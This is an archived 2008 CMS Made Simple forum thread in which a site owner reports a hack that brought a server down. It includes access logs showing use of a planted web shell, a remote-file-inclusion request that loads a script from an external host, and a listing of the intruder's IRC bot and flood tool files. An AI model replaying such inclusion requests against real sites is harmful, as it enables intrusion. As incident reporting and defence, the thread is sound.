CMS Made Simple Forums

Content management as it is meant to be
https://forum.cmsmadesimple.org/

CMSms-Site hack, complete Server down

https://forum.cmsmadesimple.org/viewtopic.php?t=22789

Page 1 of 1

CMSms-Site hack, complete Server down

Posted: Wed Jun 11, 2008 6:51 am
by tholler
Hi to you all,

two of my CMSms-Site have be hackt, a DOS-Attack was started the hoster took the complete server from the net.

There is a new folder under the TMP-Folder. It is called in different ways (sl or fload).

I will post more infos when the server is online again and my provider will send me detailed information.

Because my english is very bad, I will write all other information in german; you can find them here http://forum.cmsmadesimple.org/index.php/topic,22787.0.html.

Regards
Th. Holler

Re: CMSms-Site hack, complete Server down

Posted: Wed Jun 11, 2008 12:28 pm
by calguy1000
we need to know
a) what version of CMS you're running
b) what the history of the site is (when did you last upgrade)
c) have you checked your httpd access logs to find out if they came in through CMS or through some other
    vulnerable script on the serrver.

Re: CMSms-Site hack, complete Server down

Posted: Wed Jun 11, 2008 3:30 pm
by tholler
calguy1000 wrote: we need to know
a) what version of CMS you're running
b) what the history of the site is (when did you last upgrade)
c) have you checked your httpd access logs to find out if they came in through CMS or through some other
    vulnerable script on the serrver.
Hi

here are the answers:
a: 1.3, updated 2 or 3 days ago
b: I normaly update asap; within 2 or 3 days after a new release is online
c: here are the logs
10/access_log:81.180.210.132 - - [10/Jun/2008:21:59:18 +0200] "GET /s.php HTTP/1.1" 200 6572 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
10/access_log:81.180.210.132 - - [10/Jun/2008:21:59:21 +0200] "POST /s.php HTTP/1.1" 200 6708 "http://www.kiga-menden.de/s.php" "Mozilla/4.0 (compatible; MSIE  6.0; Windows NT 5.1; SV1)"
10/access_log:81.180.210.132 - - [10/Jun/2008:21:59:44 +0200] "POST /s.php HTTP/1.1" 200 6777 "http://www.kiga-menden.de/s.php" "Mozilla/4.0 (compatible; MSIE  6.0; Windows NT 5.1; SV1)"

08/access_log:72.46.131.186 - - [08/Jun/2008:14:08:33 +0200] "GET //lib/config.functions.php?dirname=http://www.com.ulaval.ca/st-hilaire/id.txt??
HTTP/1.1" 20
0 - "-" "libwww-perl/5.810"

My provider found a file called s.php on the root of the domain and suspicious directories under TMP:

1. Domain, everything in folder FL:
03.09.2006  02:02            20.358 configure
11.06.2008  12:43              contrib
11.06.2008  00:00                64 cyc.acc
11.06.2008  11:00            1.047 cyc.levels
10.06.2008  22:00                6 cyc.pid
11.06.2008  11:00              298 cyc.session
19.05.2008  10:12            1.310 cyc.set
03.09.2006  02:03            4.144 genuser
14.07.2005  14:51          590.481 httpd
10.07.2005  15:31            2.156 Makefile
11.06.2008  12:43              randfiles
05.07.2005  13:38            13.399 stealth
01.06.2006  14:40            21.534 xhide
              11 Datei(en),        654.797 Bytes

Verzeichnis von \contrib

11.06.2008  12:43              .
11.06.2008  12:43              ..
11.06.2008  12:43              config
23.06.2001  18:36            1.251 cvsupdate
11.06.2008  12:43              patches
              1 Datei(en),          1.251 Bytes

Verzeichnis von \config

11.06.2008  12:43              .
11.06.2008  12:43              ..
07.04.2001  04:38            5.843 config
07.04.2001  04:38            1.131 Input.pl
11.06.2008  12:43              servers
              2 Datei(en),          6.974 Bytes

Verzeichnis von \servers

11.06.2008  12:43              .
11.06.2008  12:43              ..
02.05.2001  09:40              289 DALNET
02.05.2001  09:40              543 EFNET
23.06.2001  04:18              735 UNDERNET
              3 Datei(en),          1.567 Bytes

Verzeichnis von \patches

11.06.2008  12:43              .
11.06.2008  12:43              ..
20.06.2001  03:32            6.901 emech-2.8.2-sha.diff
              1 Datei(en),          6.901 Bytes

Verzeichnis von \randfiles

11.06.2008  12:43              .
11.06.2008  12:43              ..
07.04.2001  04:38            5.195 randaway.e
07.04.2001  04:38            3.982 randinsult.e
07.04.2001  04:38              830 randkicks.e
07.04.2001  04:38              519 randnicks.e
07.04.2001  04:38            2.495 randpickup.e
07.04.2001  04:38            55.316 randsay.e
07.04.2001  04:38            3.651 randsignoff.e
07.04.2001  04:38            1.465 randversions.e


2. Domain, everything in Dir FLOOD:
08.09.2002  04:51            15.988 juno
09.02.2001  04:30            8.268 slice2
01.10.2001  20:59            8.268 slice3
06.08.2000  14:56            13.399 stealth
07.02.1996  03:38            17.690 synk
07.03.2002  05:29            14.911 vadimII

By now I have added the security-thinks of the security-thread. Hope thats enought.

Regards
Thorsten

Re: CMSms-Site hack, complete Server down

Posted: Wed Jun 11, 2008 6:58 pm
by Pierre M.
Hello,

it would be nice to know the http logS just before s.php was put in your web space "to find out if they came in through CMS or through some other vulnerable script on the server" (I quote Calguy1000 because my English isn't native either). Can your hosting provider or you give information about this ?

Don't bother with intruder directories : nuke them.

And thanks for your feedback : it strengthem the double slash // URL filtering rule.

Pierre M.
All times are UTC
Page 1 of 1

Powered by phpBB® Forum Software © phpBB Limited